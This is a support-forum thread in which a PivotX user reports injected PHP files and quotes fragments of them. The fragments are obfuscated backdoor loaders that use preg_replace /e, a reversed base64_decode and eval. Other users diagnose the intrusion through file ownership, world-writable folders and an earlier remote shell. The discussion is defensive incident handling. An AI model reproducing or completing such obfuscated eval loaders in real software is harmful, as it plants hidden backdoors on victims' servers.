PivotX Support Community

[corkypa]

I had 3 executable files appear in my pivot installation.

templates/default.php begins

Code: Select all

preg_replace("/[ttcowsjwoxa]*.+[hkitnlhepz]*/ei",str_replace(" ","","    \x65

And templates/_sub_commentform_extended.php begins

Code: Select all

$csecacucgm=array_map(strrev("edoce"."d"."_46es"."ab"),array(str_replace(" ",""," "."aWYg KCF"

and ends with

Code: Select all

eval ($csecacucgm[0]);

images/index.php is similar to the default.php file, but begins contains

Code: Select all

preg_replace("/[ihupkodkhdplcfr]*.+[ymdyneoolwob]*/ei",str_replace(" ",""," \x65 \x76  \x61

I have copies of these files.

[corkypa]

I found 2 more php files in a subfolder of my images folder. These files and the previous 2 had different user and group ids than my own

[Harm10]

Do you remember what version of 2.3.1 your installation file is? And were you got it from?
Maybe you could download the latest 2.3.x version from http://pivotx.net/files/unstable-development/ and check again?

[corkypa]

How would I find out exactly which version of 2.3.1 I installed? I don't seem to have the installation file, but judging from the dates on the README.txt, I installed it on Nov. 5 of last year.

[hansfn]

These files and the previous 2 had different user and group ids than my own

Very important observation. Different user and group ids normally means that you are on a server with several users/domains and those aren't jailed (separated). If the user is a normal account, you should report that user for hacking to your ISP immediately. (That user might have been hacked himself.) If the user is the webserver user, the problem is different.

The reason you found the files in the templates/images directory, is that these are world-writable.

PS! Normally Harm's advice is very good, but in this case his question is irrelevant.

[corkypa]

I did report the problem to the hosting company, hoping that the UID/GID would be a clue. They said that it looks like a php script exploit uploaded them, and there wasn't anything they could do. I have asked if the UID is the web server user, and am awaiting the reply.

[hansfn]

OK. You can check for yourself - what is the uid/gid for for example db/ser_config.php (which is created by PivotX and hence the web server user)?

Another question. Was it a fresh install of 2.3.1 or did you upgrade? So far all other users reporting hacking was infected (by the TimThumb exploit) before upgrading - the hacking was just discovered much later.

[corkypa]

The UID/GID of the files are those that the web server runs under.

This was an upgrade, but I did it long ago. I am certain that the offending files were just uploaded. I got no warnings until I logged in yesterday, and the modification time is consistent with it being a recent change. Unfortunately, I see nothing odd in the access or error logs around the time of the change.

[hansfn]

Sure, those files might have been recently uploaded, but a remote shell/backdoor might have been uploaded long time ago. Using the remote shell/backdoor, they can upload new files at any time. Typically they activate a hacked server first when they need it. (The same happened to a different PivotX user recently - see similar forum thread.)

Anyway, if you have the web server access log for period you think the (new) files were uploaded, I'm willing to take a look - just to confirm that you were indeed hacked long time ago.